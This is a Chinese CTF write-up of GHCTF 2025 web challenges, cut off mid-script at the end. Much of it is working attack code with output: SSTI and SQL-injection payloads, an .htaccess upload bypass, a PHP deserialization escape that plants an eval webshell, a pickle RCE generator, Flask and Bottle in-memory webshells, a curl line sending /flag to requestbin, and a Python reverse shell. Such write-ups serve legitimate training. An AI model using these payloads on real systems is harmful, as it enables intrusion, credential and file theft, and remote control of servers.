upload?SSTI!
{{7*7}}
{{lipsum["\x5f\x5fglobals\x5f\x5f"]["\x6f\x73"]["environ"]}}
'FLAG': 'no_FLAG'哭(
{{ lipsum["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["open"]("/fla\x67").read() }}
NSSCTF{c9d3afc7-3d4c-47e7-a932-3da8e41fcef7}其实还有一个原因是黑名单有的过滤了__有的没有,猜想就是用没过滤的+\x5f绕过w~
试了半天,拼尽全力终于战胜(
(>﹏<)
XXE攻击
curl -X POST http://node2.anna.nssctf.cn:28874/ghctf -d "xml=]>%26xxe;"
SQL???
!!!!!背景是哀酱啊啊啊啊,美如画!!!
?id=1 order by 5 --
?id=1 union select 1,2,3,4,5 --卡住了(我甚至还把sqllabs的解翻了一遍
就在此时!
我看见typora好像还有一个sql()
?id=1 union select 1,2,3,4,sqlite_version();
?id=1 union select 1,2,3,4,sql from sqlite_master;
直接梭哈!
?id=1 union select 1,2,3,4,flag from flag
NSSCTF{Funny_Sq11111111ite!!!}Popppppp
< ?php
$i = 0;
while (true) {
$str = (string)$i;
$hash = md5(md5($str));
// 检查前三位是否为'666',且第四位为非数字字符
if (substr($hash, 0, 3) === '666' && !is_numeric(substr($hash, 3, 1))) {
echo "Found valid string: $str\n";
echo "MD5(MD5($str)) = $hash\n";
break;
}
$i++;
}
?>
#Found valid string: 213
#MD5(MD5(213)) = 666ca9a2be31fd949cb9b55686caef9a好多字。。。不想看,遂卒(
回过头来想好吧其实主要可能是方向错了,我一直没往原生类那儿想,已经被system洗脑了,没咋遇过用glob的pop。。。(
ez_readfile
魔改一下
< ?php
show_source(__FILE__);
echo "0";
if (md5($_POST['a']) === md5($_POST['b'])) {
echo "1";
}
if ($_POST['a'] != $_POST['b']) {
echo "2";
}
if (is_string($_POST['a']) && is_string($_POST['b'])) {
echo "3";
echo file_get_contents($_GET['file']);
}
?> curl -X POST http://kkk:8999/ -d "a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
发?file=index.php全给我回过来了,说明ok了
从伪协议到漏洞然后试了好多也不行。。。
curl -X POST http://node2.anna.nssctf.cn:28308/?file=/etc/passwd/ -d "a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
#有返回,但并没有什么用(file_get_contents() 函数详解与使用_php file get contents-CSDN博客从这里感觉要用反弹shell,能访问网址
真的很崩溃呜呜呜呜呜呜呜,卒(
UPUPUP
我基本照着文件上传大全都试了一遍,还是不行。。。而且直接上传pass.gif真不行,.use.ini也没前置php,好像只能用.htaccess。。。但真的不成功。。。一筹莫展。
然后疯狂bing。。。。。找到篇文章。。。
vulnerability-paper/skill/Apache_的._htaccess_利用技巧.md at master · MrWQ/vulnerability-paper
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/gif
#define width 1337
#define height 1337
SetHandler application/x-httpd-php
Escape!
class User
{
public $username;
public $isadmin;
public function __construct($username,$isadmin)
{
$this->username=$username;
$this->isadmin=$isadmin;
}
}
if($data[0]['username']==='admin') {
$user = new User($username, true);
#要通过只要isadmin=true就有机会
}
else{
$user = new User($username, false);
}
function setSignedCookie($serializedData, $cookieName = 'user_token', $secretKey = 'fake_secretKey') {
$signature = hash_hmac('sha256', $serializedData, $secretKey);
$token = base64_encode($serializedData . '|' . $signature);
setcookie($cookieName, $token, time() + 3600, "/"); // 设置有效期为1小时
}
$User=login($SQL,$username,$password);
$User_ser=waf(serialize($User));
setSignedCookie($User_ser);#用这种方法加工先注册一个瞄一眼
Cookie: user_token=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjQ6InFpbmciO3M6NzoiaXNhZG1pbiI7YjowO318NDNjMDhhZjJkYjgxZDI3OTg1YzA2MjgxMTE5ZjBhNDg0NmRlMGUzMmZlNjA3MmE0NTM0YWMzMWMyMDU4NzQ5Mw==
O:4:"User":2:{s:8:"username";s:4:"qing";s:7:"isadmin";b:0;}|43c08af2db81d27985c06281119f0a4846de0e32fe6072a4534ac31c20587493尝试了很多方法都无法把secretKey搞出来,有点懵。。。
< ?php
function waf($c)
{
$lists=["flag","'","\\","sleep","and","||","&&","select","union"];
foreach($lists as $list){
$c=str_replace($list,"error",$c);
}
#echo $c;
return $c;
}想到了[安洵杯 2019]easy_serialize_php这道题。印象很深因为我当时一直在数那个字符串的个数试图凑出跟wp一样的答案。。。
ww具体的原理自己看吧PHP反序列化字符逃逸详解_php filter字符串溢出-CSDN博客
要多出来";}s:7:"isadmin";b:1}共21个字符,用最短的and(与error差两个)和flag(1个),即10个and和1个flag。
so,用flagandandandandandandandandandand";s:7:"isadmin";b:1;}当username注册再登就行了,他就会变成下面那样就覆盖了就不用搞token了ww
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU1OiJlcnJvcmVycm9yZXJyb3JlcnJvcmVycm9yZXJyb3JlcnJvcmVycm9yZXJyb3JlcnJvcmVycm9yIjtzOjc6ImlzYWRtaW4iO2I6MTt9IjtzOjc6ImlzYWRtaW4iO2I6MDt9fGVhMWVkOWRmNTVkNjJhNzdhNGU0M2JhMTA4ZTBmYzVhNWYzMDc3ZjVmM2Y0NzkxMTVhNTM4MmZiMDJkNWYxYjM=
O:4:"User":2:{s:8:"username";s:55:"errorerrorerrorerrorerrorerrorerrorerrorerrorerrorerror";s:7:"isadmin";b:1;}";s:7:"isadmin";b:0;}|ea1ed9df55d62a77a4e43ba108e0fc5a5f3077f5f3f479115a5382fb02d5f1b3
#被顶出来的";s:7:"isadmin";b:0;}不再执行,payload顺利逃出waf。
终于不报错了,我要哭了QAQ
尝试传🐎没效果。。。我恨
找了半天不知道哪错了,直到发现忘打开dashboard.php源代码了,呃呃
if($user->isadmin){
$tmp=file_get_contents("tmp/admin.html");
echo $tmp;
if($_POST['txt']) {
$content = '';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
}
}filename=php://filter/write=convert.base64-decode/resource=m.php&txt=aPD9waHAgcGhwaW5mbygpOw==
okk
写个🐎
filename=php://filter/write=convert.base64-decode/resource=qaq.php&txt=aPD9waHAgQGV2YWwoJF9QT1NUWyJwYXNzIl0pOw==
嘻嘻
总之这次还有一个教训就是有的不会的可以先放。。。一共7天我可能有四五天在看web3和5,因为总感觉差临门一脚了(
实在不想研究了,感觉自己的知识面还是窄,天知道pickle出来时我一万个后悔,早知道听学姐的把[HFCTF 2021 Final]easyflask给做了,但当时太懒了(
总之出wp在复现一遍吧。。现在对电脑有点PTSD了,要燃成舍利子了。。。
sorry我忘加web标签了,祸不单行。。。。。。。。。。。。。。。。。。。。这有什么改的方法吗(哭
官方wp:[GHCTF2025 Web Write Up.pdf](file:///D:/Downloads/GHCTF2025 Web Write Up.pdf)
[GHCTF 2025]ezzzz_pickle
在
/proc下,每个正在运行的进程都有一个以其进程 ID(pid)命名的目录。例如,/proc/1对应进程 ID 为 1 的进程。/proc/[pid]/environ文件存储了对应进程的环境变量信息。进程的环境变量包含了许多重要信息,如系统路径(
PATH)、用户信息(USER、HOME)、语言设置(LANG)等,这些环境变量会影响进程的运行方式和行为。进程 ID 为 1 的进程通常是系统初始化进程(在传统的 SysV init 系统中是
init进程,在使用 systemd 的系统中是systemd进程),它是所有其他进程的祖先进程,负责启动和管理系统的其他进程。
弱密码
环境变量读取,同是/docker-entrypoint.sh,或者读取/proc/1/environ
文件包含之/proc/self/environ - Junglezt - 博客园
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
import pickle
import hmac
import hashlib
import base64
import time
import os
app = Flask(__name__)
def generate_key_iv():#从环境变量获取密钥和IV
key = os.environ.get('SECRET_key').encode()
iv = os.environ.get('SECRET_iv').encode()
return key, iv
def aes_encrypt_decrypt(data, key, iv, mode='encrypt'):
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
#CBC模式需要确保IV是随机且不可预测的,但这里IV是从环境变量获取的固定值,每次加密使用相同的IV,这会带来安全隐患
if mode == 'encrypt':
encryptor = cipher.encryptor()
padder = padding.PKCS7(algorithms.AES.block_size).padder()
padded_data = padder.update(data.encode()) + padder.finalize()
result = encryptor.update(padded_data) + encryptor.finalize()
return base64.b64encode(result).decode()
elif mode == 'decrypt':
decryptor = cipher.decryptor()
encrypted_data_bytes = base64.b64decode(data)
decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()
unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()
unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()
return unpadded_data.decode()
users = {
"admin": "admin123",
}
def create_session(username):
session_data = {
"username": username,
"expires": time.time() + 3600
}
pickled = pickle.dumps(session_data)#pickle序列化会话数据
pickled_data = base64.b64encode(pickled).decode('utf-8')#使用 base64.b64encode() 方法对序列化后的数据进行 Base64 编码,然后使用 decode() 方法将编码后的字节数据解码为字符串 pickled_data。
key,iv=generate_key_iv()
session=aes_encrypt_decrypt(pickled_data, key, iv,mode='encrypt')#AES加密
return session
def dowload_file(filename):
path=os.path.join("static",filename)
with open(path, 'rb') as f:
data=f.read().decode('utf-8')
return data
def validate_session(cookie):
try:
key, iv = generate_key_iv()
pickled = aes_encrypt_decrypt(cookie, key, iv,mode='decrypt')
pickled_data=base64.b64decode(pickled)
session_data = pickle.loads(pickled_data)
if session_data["username"] !="admin":
return False
return session_data if session_data["expires"] > time.time() else False
except:
return False
@app.route("/",methods=['GET','POST'])
def index():
if "session" in request.cookies:
session = validate_session(request.cookies["session"])
if session:
data=""
filename=request.form.get("filename")
if(filename):
data=dowload_file(filename)
return render_template("index.html",name=session['username'],file_data=data)
return redirect("/login")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get("username")
password = request.form.get("password")
if users.get(username) == password:
resp = make_response(redirect("/"))
resp.set_cookie("session", create_session(username))
return resp
return render_template("login.html",error="Invalid username or password")
return render_template("login.html")
@app.route("/logout")
def logout():
resp = make_response(redirect("/login"))
resp.delete_cookie("session")
return resp
if __name__ == "__main__":
app.run(host="0.0.0.0",debug=False)PYTHON_SHA256=bfb249609990220491a1b92850a07135ed0831e41738cf681d63cf01b2a8fbd1
HOSTNAME=6172baf993ab4edf
PYTHON_VERSION=3.10.16
PWD=/app
HOME=/root
LANG=C.UTF-8
GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
FLAG=no_FLAG
SECRET_key=ajwdopldwjdowpajdmslkmwjrfhgnbbv
SHLVL=1
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SECRET_iv=asdwdggiouewhgpw
_=/usr/local/bin/flask
OLDPWD=/将fake_flag.txt移除并重创一个新的并写进ls /
import pickle
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
import time
import os
# 生成密钥和IV
def generate_key_iv():
KEY = "ajwdopldwjdowpajdmslkmwjrfhgnbbv".encode()
IV = "asdwdggiouewhgpw".encode()
return KEY, IV
# AES加密函数
def aes_encrypt_decrypt(data, key, iv, mode='encrypt'):
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
if mode == 'encrypt':
encryptor = cipher.encryptor()
padder = padding.PKCS7(algorithms.AES.block_size).padder()
padded_data = padder.update(data.encode()) + padder.finalize()
result = encryptor.update(padded_data) + encryptor.finalize()
return base64.b64encode(result).decode()
# 创建恶意session
def create_malicious_session():
# 创建恶意的python对象
#reduce一次只能执行一个函数,当exec被禁用时,就不能一次执行多条指令了),而需要手动拼接或构造opcode了,按理说这里用reduce也行,但试了下不行,这是为什么???
opcode = b'''(cos
system
S'ls / > /app/static/fake_flag.txt'
o.'''
# Base64编码
pickled_data = base64.b64encode(opcode).decode('utf-8')
# AES加密
key, iv = generate_key_iv()
encrypted_session = aes_encrypt_decrypt(pickled_data, key, iv, mode='encrypt')
return encrypted_session
# 生成恶意cookie
malicious_cookie = create_malicious_session()
print("恶意Cookie值:")
print(malicious_cookie)
print("\n将此值设置为session cookie,然后访问网站根路径")用生成的session访问后再次用admin的session访问fake_flag.txt即可
用内存马文章 - 新版Flask框架下用钩子函数实现内存马的方式 - 先知社区
import os
import requests
import pickle
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
key = b'ajwdopldwjdowpajdmslkmwjrfhgnbbv'
iv = b'asdwdggiouewhgpw'
# 生成恶意Payload
class Exploit:
def __reduce__(self):
return (exec, ("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('shell')).read()",))
#随便访问一个不存在的界面造成404,再往shell里rce
# AES 加密和解密函数(⼀个函数处理加密和解密)
def aes_encrypt_decrypt(data, key, iv, mode='encrypt'):
# 创建加密器/解密器
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
if mode == 'encrypt':
encryptor = cipher.encryptor()
# 数据填充,确保数据的⻓度是AES块⼤⼩的倍数
padder = padding.PKCS7(algorithms.AES.block_size).padder()
padded_data = padder.update(data.encode()) + padder.finalize()
result = encryptor.update(padded_data) + encryptor.finalize()
return base64.b64encode(result).decode() # 返回加密后的数据(Base64编码)
elif mode == 'decrypt':
decryptor = cipher.decryptor()
# 解密数据
encrypted_data_bytes = base64.b64decode(data)
decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()
# 去除填充
unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()
unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()
return unpadded_data.decode()
e = Exploit()
pickled = pickle.dumps(e)
pickled_data = base64.b64encode(pickled).decode('utf-8')
session = aes_encrypt_decrypt(pickled_data, key, iv, mode='encrypt')
print("session=", session)
Popppppp(2)
< ?php
error_reporting(0);
class CherryBlossom {
public $fruit1;
public $fruit2;
public function __construct($a) {
$this->fruit1 = $a;
}
function __destruct() {
echo $this->fruit1;
}
public function __toString() {
$newFunc = $this->fruit2;
return $newFunc();
}
}
class Forbidden {
private $fruit3;
public function __construct($string) {
$this->fruit3 = $string;
}
public function __get($name) {
$var = $this->$name;
$var[$name]();
}
}
class Warlord {
public $fruit4;
public $fruit5;
public $arg1;
public function __call($arg1, $arg2) {
$function = $this->fruit4;
return $function();
}
public function __get($arg1) {
$this->fruit5->ll2('b2');
}
}
class Samurai {
public $fruit6;
public $fruit7;
public function __toString() {
$long = @$this->fruit6->add();
return $long;
}
public function __set($arg1, $arg2) {
if ($this->fruit7->tt2) {
echo "xxx are the best!!!";
}
}
}
class Mystery {
public function __get($arg1) {#__get($property) 当访问一个对象的不存在或不可访问的属性时自动调用,传递属性名作为参数。
array_walk($this, function ($day1, $day2) {#array_walk($this, ...) 会遍历当前对象的所有公共属性:PHP 会将对象的公共属性转换为数组形式(键名是属性名,值是属性值)。假设对象有属性name => "John",则执行 new name("John")。
$day3 = new $day2($day1);
foreach ($day3 as $day4) {
echo ($day4 . '<br>');
}
});
}
}
class Princess {
protected $fruit9;
protected function addMe() {
return "The time spent with xxx is my happiest time" . $this->fruit9;
}
public function __call($func, $args) {
call_user_func([$this, $func . "Me"], $args);
}
}
class Philosopher {
public $fruit10;
public $fruit11="sr22kaDugamdwTPhG5zU";
public function __invoke() {#__invoke() 当将一个对象作为函数进行调用时自动调用。
if (md5(md5($this->fruit11)) == 666) {
return $this->fruit10->hey;
}
}
}
class UselessTwo {
public $hiddenVar = "123123";
public function __construct($value) {
$this->hiddenVar = $value;
}
public function __toString() {
return $this->hiddenVar;
}
}
class Warrior {
public $fruit12;
private $fruit13;
public function __set($name, $value) {
$this->$name = $value;
if ($this->fruit13 == "xxx") {
strtolower($this->fruit12);
}
}
}
class UselessThree {
public $dummyVar;
public function __call($name, $args) {
return $name;
}
}
class UselessFour {
public $lalala;
public function __destruct() {
echo "Hehe";
}
}
if (isset($_GET['GHCTF'])) {
unserialize($_GET['GHCTF']);
} else {
highlight_file(__FILE__);
}https://blog.csdn.net/cjdgg/article/details/115314651
不能说毫不相关,只能说一模一样,还是见识少了(
当时已经将_get前的推出了,但想的是Forbidden传system却又找不到传参的地方。。。
DirectoryIterator 类
FilesystemIterator 类,这俩用glob:///*,用/也行
GlobIterator 类各不同吧,但GlobIterator自带glob,用/*
SplFileInfo 类为单个文件的信息提供了一个高级的面向对象的接口,可以用于对文件内容的遍历、查找、操作等
< ?php
#CherryBlossom.__destruct()->CherryBlossom.__toString()->Philosopher.__invoke()->Mystery.__get
class CherryBlossom {
public $fruit1;
public $fruit2;
}
class Mystery {
public $FilesystemIterator='glob:///*';
}
class Philosopher {
public $fruit10;
public $fruit11=213;#另外我发现这里加不加引号都行,看来'=='是这样的(
}
$a=new CherryBlossom();
$a->fruit1=new CherryBlossom();
$a->fruit1->fruit2=new Philosopher();
$a->fruit1->fruit2->fruit10=new Mystery();#fruit10而不是11
echo serialize($a);
#感觉wp里的pop链写法很简单易懂啊,建议大家都这么写(public $SplFileObject='/flag44545615441084';`
O:13:"CherryBlossom":2:{s:6:"fruit1";O:13:"CherryBlossom":2:{s:6:"fruit1";N;s:6:"fruit2";O:11:"Philosopher":2:{s:7:"fruit10";O:7:"Mystery":1:{s:13:"SplFileObject";s:19:"/flag44545615441084";}s:7:"fruit11";i:213;}}s:6:"fruit2";N;}得出。
SQL???(2)
这个故事告诉我们要看一下错误后的内容,还有要掌握一门外语(
--random-agent它的作用是让 SQLMap 在每次向目标网站发送请求时,随机选择一个不同的用户代理(User-Agent)字符串。许多 Web 应用防火墙(WAF)会根据用户代理字符串来判断请求是否合法。如果一个来源的请求始终使用相同的用户代理字符串,WAF 可能会将其识别为自动化工具(如 SQLMap)的请求,并进行拦截。而使用
--random-agent选项后,每次请求的用户代理字符串都不同,模拟了不同用户使用不同浏览器和设备访问网站的情况,从而增加了绕过 WAF 检测的可能性。
sqlmap -u "http://node1.anna.nssctf.cn:28030/?id=1" --random-agent
但其实能让它扫16分钟的也是神人了
Message in a Bottle
源代码如下
from bottle import Bottle, request, template, run
app = Bottle()
# 存储留言的列表
messages = []
def handle_message(message):
message_items = "".join([f"""
{msg}
#{idx + 1} - 刚刚
""" for idx, msg in enumerate(message)])
board = f"""
简约留言板
:root {{
--primary-color: #4a90e2;
--hover-color: #357abd;
--background-color: #f8f9fa;
--card-background: #ffffff;
--shadow-color: rgba(0, 0, 0, 0.1);
}}
body {{
background: var(--background-color);
min-height: 100vh;
padding: 2rem 0;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}}
.container {{
max-width: 800px;
background: var(--card-background);
border-radius: 15px;
box-shadow: 0 4px 6px var(--shadow-color);
padding: 2rem;
margin-top: 2rem;
animation: fadeIn 0.5s ease-in-out;
}}
@keyframes fadeIn {{
from {{ opacity: 0; transform: translateY(20px); }}
to {{ opacity: 1; transform: translateY(0); }}
}}
.message-card {{
background: var(--card-background);
border-radius: 10px;
padding: 1.5rem;
margin: 1rem 0;
transition: all 0.3s ease;
border-left: 4px solid var(--primary-color);
box-shadow: 0 2px 4px var(--shadow-color);
}}
.message-card:hover {{
transform: translateX(10px);
box-shadow: 0 4px 8px var(--shadow-color);
}}
.message-content {{
font-size: 1.1rem;
color: #333;
line-height: 1.6;
margin-bottom: 0.5rem;
}}
.message-time {{
color: #6c757d;
font-size: 0.9rem;
display: block;
margin-top: 0.5rem;
}}
textarea {{
width: 100%;
height: 120px;
padding: 1rem;
border: 2px solid #e9ecef;
border-radius: 10px;
resize: vertical;
font-size: 1rem;
transition: border-color 0.3s ease;
}}
textarea:focus {{
border-color: var(--primary-color);
outline: none;
box-shadow: 0 0 0 3px rgba(74, 144, 226, 0.1);
}}
.btn-custom {{
background: var(--primary-color);
color: white;
padding: 0.8rem 2rem;
border-radius: 10px;
border: none;
transition: all 0.3s ease;
font-weight: 500;
text-transform: uppercase;
letter-spacing: 0.05rem;
}}
.btn-custom:hover {{
background: var(--hover-color);
transform: translateY(-2px);
box-shadow: 0 4px 8px var(--shadow-color);
}}
h1 {{
color: var(--primary-color);
text-align: center;
margin-bottom: 2rem;
font-weight: 600;
font-size: 2.5rem;
text-shadow: 2px 2px 4px var(--shadow-color);
}}
.btn-danger {{
transition: all 0.3s ease;
padding: 0.6rem 1.5rem;
border-radius: 10px;
text-transform: uppercase;
letter-spacing: 0.05rem;
}}
.btn-danger:hover {{
transform: translateY(-2px);
box-shadow: 0 4px 8px var(--shadow-color);
}}
.text-muted {{
font-style: italic;
color: #6c757d !important;
}}
@media (max-width: 576px) {{
h1 {{
font-size: 2rem;
}}
.container {{
padding: 1.5rem;
}}
.message-card {{
padding: 1rem;
}}
}}
简约留言板
一键清理
发布留言
最新留言({len(message)}条)
{f'点击右侧清理按钮可清空列表' if message else ''}
{message_items}
"""
return board
def waf(message):
return message.replace("{", "").replace("}", "")
@app.route('/')
def index():
return template(handle_message(messages))
@app.route('/Clean')
def Clean():
global messages
messages = []
return 'window.location.href="/"'
@app.route('/submit', method='POST')
def submit():
message = waf(request.forms.get('message'))
messages.append(message)
return template(handle_message(messages))
if __name__ == '__main__':
run(app, host='localhost', port=9000)很明显的Bottle模版注入,过滤了{和},尝试闭合标签并写入python代码
</div>
% print(1)
<div>没有回显,但是代码也消失了,判断应该是执行命令但是没有回显
尝试直接外带数据
</div>
% print(__import__('os').popen('curl http://requestbin.cn:80/1lt58m51?data=$(cat /flag | base64)').read())`
<div>
#使用 __import__('os') 动态导入 os 模块,__import__ 是 Python 内置的用于动态导入模块的函数。
#调用 os.popen 函数执行一个系统命令。
#使用 read() 方法读取 os.popen 执行命令后的输出结果,并通过 print 函数打印出来依然没有接收到,判断可能不出网,使用sleep进行盲注
</div>
% __import__("time").sleep(2) if open("/flag").read()[0]=='N' else 1
<div>产生延时,的确可行,逐位爆破即可,先猜个前7位:NSSCTF{
然后就是爆破了,使用BP进行逐位半自动爆破(逻辑有点复杂,不会写脚本),注意BP默认多线程爆破,不容易判断在哪一次上传后产生延时,将线程改为1即可,字典使用abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_!@#$%^&*()-+,然后将每一次上传时第一个产生延时的字符填入对应的flag位置即可(注意环境重启flag会切换,中间换环境了要重新开始,我就中间换了环境导致flag不对卡半天),每判断一位清理一次留言板。
最终得到flag
NSSCTF{6b3d59cb-29a4-451b-ac74-6abc607ea182}
—-xianxin
内存马:
Python Web内存马多框架植入技术详解 – 奇安信技术研究院
SimpleTemplate 模板引擎 — Bottle 0.13-dev 文档
#内存马
% from bottle import Bottle, request
% app=__import__('sys').modules['__main__'].__dict__['app']
% app.route("/shell","GET",lambda :__import__('os').popen(request.params.get('lalala')).read())
#从 bottle 框架中导入 Bottle 类和 request 对象。Bottle 类用于创建 Web 应用,request 对象用于获取客户端请求的相关信息。
#使用 __import__('sys') 动态导入 sys 模块,通过 sys.modules['__main__'] 获取主模块,再从主模块的命名空间(__dict__)中获取名为 app 的 Bottle 应用实例。(通过 sys 模块获取主模块的命名空间,从中提取出已存在的 Bottle 应用实例 app。)
#为 Bottle 应用添加一个新的路由 /shell,该路由处理 GET 请求。当客户端访问 /shell 时,会执行一个匿名函数。这个匿名函数的功能是:
#使用 request.params.get('lalala') 从请求的查询参数中获取名为 lalala 的值。
#使用 __import__('os') 动态导入 os 模块,然后调用 os.popen 函数执行从查询参数中获取的值作为系统命令。
#最后读取命令执行的输出结果并返回给客户端。#弹shell
%__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket
();s.connect((\"111.xxx.xxx.xxx\",7777));[os.dup2(s.fileno(),f)for f in(0,
1,2)];pty.spawn(\"sh\")'").read()
"""python3 -c:这是 Python 命令行选项,用于直接执行后面单引号内的 Python 代码。
import os,pty,socket:导入 os、pty 和 socket 模块。os 模块提供了与操作系统进行交互的功能;pty 模块用于创建伪终端;socket 模块用于网络通信。
s = socket.socket():创建一个 TCP 套接字对象 s。
s.connect(("111.xxx.xxx.xxx", 7777)):尝试连接到指定 IP 地址(111.xxx.xxx.xxx)和端口(7777)的远程服务器。
[os.dup2(s.fileno(), f) for f in (0, 1, 2)]:
s.fileno() 返回套接字对象 s 的文件描述符。
os.dup2 函数用于复制文件描述符,这里将标准输入(文件描述符 0)、标准输出(文件描述符 1)和标准错误(文件描述符 2)都重定向到套接字 s。这样,后续的输入输出操作都会通过网络套接字进行。
pty.spawn("sh"):启动一个新的 shell 进程(这里是 sh),并将其与之前重定向的标准输入、输出和错误关联起来。这样,攻击者在远程服务器上就可以通过这个套接字控制目标系统的 shell,实现反弹 shell 的效果。"""ez_readfile(2)
import requests
TARGET_URL = "http://node1.anna.nssctf.cn:28067/"
POST_DATA = {#POST 请求携带的数据。
"a": "TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak",
"b": "TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak"
}
TEST_PATHS = [
"/flag", # 绝对路径
"../../../../flag", # 路径遍历
"/flag.txt", # 常见扩展名
"/etc/passwd",
"/app/flag",
"/run/secrets/flag",
"/opt/flag",
"/usr/local/flag",
"/docker-entrypoint.sh",
"/tmp/flag",
"tmp/flag.tmp",
"/var/tmp/flag",
"/var/log/apache2/access.log",
"/var/log/nginx/access.log",
"/var/log/auth.log",
"/var/log/syslog",
"/var/www/html/index.php",
"/var/www/html/config.php",
"/var/www/html/.env",
"/var/www/html/admin/flag",
"/var/www/html/uploads/flag",
"/var/www/html/secret/flag",
"/var/www/html/robots.txt",
"/var/backups/flag",
"/var/backups/flag.bak",
"/var/backups/app.tar.gz",
"/var/lib/gnats/flag",
"/home/flag",
"/home/user/flag",
"/etc/shadow",
"/etc/flag",
"/etc/motd",
"/etc/hosts",
"/etc/environment",
"/proc/self/environ",
"/proc/version",
"/tmp/flag",
"/tmp/flag.tmp",
"/var/tmp/flag",
"/var/log/apache2/access.log",
"/var/log/nginx/access.log",
"/var/log/auth.log",
"/var/log/syslog",
"/flag.bak",
"/flag.old",
"/flag.swp",
"/flag.swo",
".flag",
".flag.txt",
".flag.php",
"._flag",
"/readme.md",
"/notice.txt",
"/hint.txt",
"/secret",
"/admin/flag",
"/api/flag",
"/v1/flag"
]
def test_paths():
for path in TEST_PATHS:
params={"file":path}#为每个路径创建一个包含 file 参数的字典 params。
try:
response=requests.post(
TARGET_URL,
data=POST_DATA,
params=params,
timeout=5
)
if response.status_code==200:
if "NSSCTF{" in response.text:
print(f"[+]成功获取 Flag:{response.text}")
return
elif "Warning" in response.text:
print("Warning")
else:
print(f"No Warning:{path}")
except Exception as e:
print(f"[!]测试{path}时出错:{str(e)}")
if __name__=="__main__":
#当脚本作为主程序运行时,调用 test_paths 函数开始测试。
test_paths()CTF中文件读取漏洞常见读取路径 - 4sh3s - 博客园
curl -X POST http://node1.anna.nssctf.cn:28067/?file=/docker-entrypoint.sh -d "a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
or CVE-2024-2961漏洞原:cnext-exploits/cnext-exploit.py at main · ambionics/cnext-exploits
在这⾥只需要修改(如果我没记错的话)send函数(请求包的参数设置),download函数(内容的正则匹 配),将check_vulnerable函数中的部分failure函数的调⽤换成pass(使⽤时,会吞字符,但不影响漏 洞利⽤。具体原因笔者太菜,不清楚),即可正常运⾏脚本。
def send(self, path: str) -> Response:
return self.session.post(
self.url,
params={"file": path},
data={
"a": b64decode("cHN5Y2hvCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFetWq88ihNWtZYYbaXqMoFf+9kkIi+P1ESiN3ZYuAjXbSzg1ExS1/tvEHQZAoJ9eyubdAX/bK6NRfQfhDyuAQ+bEtSBpUr5SA95RSrcK7G0D95jQ0DaMjmLwwB/i19oxtOLZDivhXwUdwbCOkO8DBv9u5jOFs63tjrzmbU5+f/C"),
